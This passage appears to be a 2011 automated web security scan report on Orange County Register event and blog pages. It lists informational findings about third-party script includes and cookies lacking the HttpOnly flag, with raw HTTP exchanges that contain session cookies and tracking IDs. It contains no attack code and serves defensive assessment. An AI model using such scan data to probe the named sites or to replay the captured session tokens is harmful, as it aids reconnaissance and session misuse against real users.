Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNGRiNzYzZTg4YWFlNDljOGMxN2EyZDJhODMyNjQ2NzUiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--abd3958ef6998e4a1e22bb270c9ad602e3240a51; path=/; expires=Tue, 03-May-2011 19:04:53 GMT; HttpOnly
Content-Length: 46792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>


<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/49.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>


<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">

<!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY -->
<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<!-- Segment Pixel for LA -->
<img src="https://secure.adnxs.com/seg?add=86590&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<!-- Turn.com --><img border="0" hspace="0" vspace="0" width="1" height="1" src="http://r.turn.com/r/beacon?b2=Qlg-SJ9DP81azSj0fEEHxYcWw3LYIZgIuSfttkVKGgS8VoKBMY3PiJdxH5h7LTsMcwCm45JpL1HUtrWz1TufUQ&cid=" />

<script language="JavaScript" type="text/javascript">
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/irvine-ca/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

4. Cross-domain script include  previous  next
There are 7 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://events.ocregister.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 81
ETag: "c3ba1f557c975ed93ec675ef4923c710"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlZTg4ODhmNDY4ZjZmZDIyMjM2Zjc1NmFiODJmOTE5NGUiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--823205b12662291813c546a95c5869e893db28cd; path=/; expires=Tue, 03-May-2011 19:04:49 GMT; HttpOnly
Content-Length: 65076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.2. http://events.ocregister.com/movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "d100228c175a633518d7c3dd5fd59162"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlY2YyMzM1MDIzZTMxODA1ODNiYzYwNmEyMDE2NzMzMWUiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--e88d80e828219c1070bee42adcd14371243ac30a; path=/; expires=Tue, 03-May-2011 19:04:50 GMT; HttpOnly
Content-Length: 45179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.3. http://events.ocregister.com/restaurants  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /restaurants

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /restaurants HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 308
ETag: "a30bfc60d123b172d8d5b09d18856bd9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlZmZiZGRlNWIxNjZlZmVkOGQwYjk3YzBlMGUxNGE5MmMiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--2ab5d5366b9bb21d5c552c92932a2ef5601b75ac; path=/; expires=Tue, 03-May-2011 19:04:50 GMT; HttpOnly
Content-Length: 57183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.4. http://events.ocregister.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 311
ETag: "2984db5ecfb57421c7718f1665d75f64"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNGE0YTE4ZDI1ZWJkN2MxZDBkZjM4NzFlNjBmOTc5ZGIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ECIJY2l0eSILSXJ2aW5lIgtyYWRpdXNpIyINbGF0aXR1ZGVmGjMzLjY3MTM5OTk5OTk5OTk5OABEZyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0lydmluZSwgQ0EiDXRpbWV6b25lIhhBbWVyaWNhL0xvc19BbmdlbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmEC0xMTcuNzkxAMi0IhF3aGVyZV9zdHJpbmdAGSIKc3RhdGUiB0NB--68c5c5c8831d706d76f9c7dd1881fccefb4abd65; path=/; expires=Tue, 03-May-2011 19:04:51 GMT; HttpOnly
Content-Length: 74243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.5. http://events.ocregister.com/venues  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /venues

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /venues HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 27
ETag: "ab9180b4bc3cf69f84553f38c65d2f58"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNzg0YmYzMDgxYTE4NGU4YTE3N2RkYWE1Njc5YTc0NmYiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--f512aa7d87975ab2665fa30d73baff08e22f50f0; path=/; expires=Tue, 03-May-2011 19:04:50 GMT; HttpOnly
Content-Length: 41226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=ocregister&domain=events.ocregister.com&cname=zvents&ctype=section&shier=entertainment|events&ghier=entertainment|events" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.6. http://events.orangecounty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.orangecounty.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 49
ETag: "960148c0939ccfa59a4adae1df85f228"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=hXw8A_Jd4WvnW0RKs5F2WA.100548890; path=/; expires=Fri, 03-Feb-2012 19:05:08 GMT
Set-Cookie: zvents_tracker_sid=hXw8A_Jd4WvnW0RKs5F2WA.100548890; path=/; expires=Fri, 03-Feb-2012 19:05:08 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlODMyNzk0YTE3M2JmNTZmOTQ5MWRmOGE3ODViNmQxZjgiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaTciDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--db2922533205e58d9924900a48730d8aa66129a6; path=/; expires=Tue, 03-May-2011 19:05:08 GMT; HttpOnly
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=orangecounty&domain=events.orangecounty.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START AD SCRIPT -->
<script type='text/javascript' src='http://common.onset.freedom.com/tools/load.php?js=common_dartads'></script>
...[SNIP]...
<!--START SITECATALYST CODE-->
<script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?cname=Homepage&ctype=homepage&cid=682983&cauthor=&pagenum=&shier=%7Chomepage&ghier=homepage&domain=www.orangecounty.com&scode=orangecounty"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

4.7. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</title>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="http://www.ocregister.com/favicon.ico" />
<script type="text/javascript" src="http://common.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&amp;scode=ocregister"></script>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=ocregister&amp;domain=fastfood.freedomblogging.com&amp;ctype=blog&amp;cname=Santa+Ana+company+expanding+line+of+eco-friendly%2C+food+delivery+bikes&amp;cauthor=Stefani+Peterson%2C+The+Orange+County+Register&amp;cid=127-86514&amp;&amp;shier=entertainment|restaurants|blogs|fastfood&amp;ghier=blogs"></script></div>
<div id="PageWrap">
   
   
       <script type="text/javascript" src="http://static.newstogram.com/ocregister/js/histogram.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=fastfood&amp;feedpath=/category/pizza/feed/&amp;max=15&amp;description=0&amp;js=1"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=fastfood&amp;feedpath=/category/restaurant-closures/feed/&amp;max=15&amp;description=0&amp;js=1"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=fastfood&amp;feedpath=/tag/new-menu/&amp;max=7&amp;description=0&amp;js=1"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=fastfood&amp;feedpath=/tag/booze-on-a-budget/&amp;max=3&amp;description=0&amp;js=1"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=ocdeals&amp;feedpath=/category/restaurants/&amp;max=5&amp;description=0&amp;js=1"></script>
...[SNIP]...
<li class="rssfeedme_li" id="" style="list-style:none;background:none;"><script type="text/javascript" src="http://widgets.freedom.com/feeds/rssheads/feedme.php?type=blog&amp;cat=fastfood&amp;feedpath=category/marketing-buzz/feed/&amp;max=12&amp;description=0&amp;js=1"></script>
...[SNIP]...
<div id="afcblog" align="center"><script type="text/javascript" src="http://common.onset.freedom.com/fi/adsense/?scode=ocregister&amp;placement=blogs"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/15137/slf.js" language="JavaScript"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://events.ocregister.com/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=7&p=49&sid=za5509dx0r HTTP/1.1
Host: events.ocregister.com
Proxy-Connection: keep-alive
Referer: http://www.ocregister.com/templates/zventsIframe.php?domain=events.ocregister.com&c=Irvine%2CCA&template=zventsOCR.html&z=92614&p=49&r=30&t=Things+to+do+in+Orange+County
Accept: */*
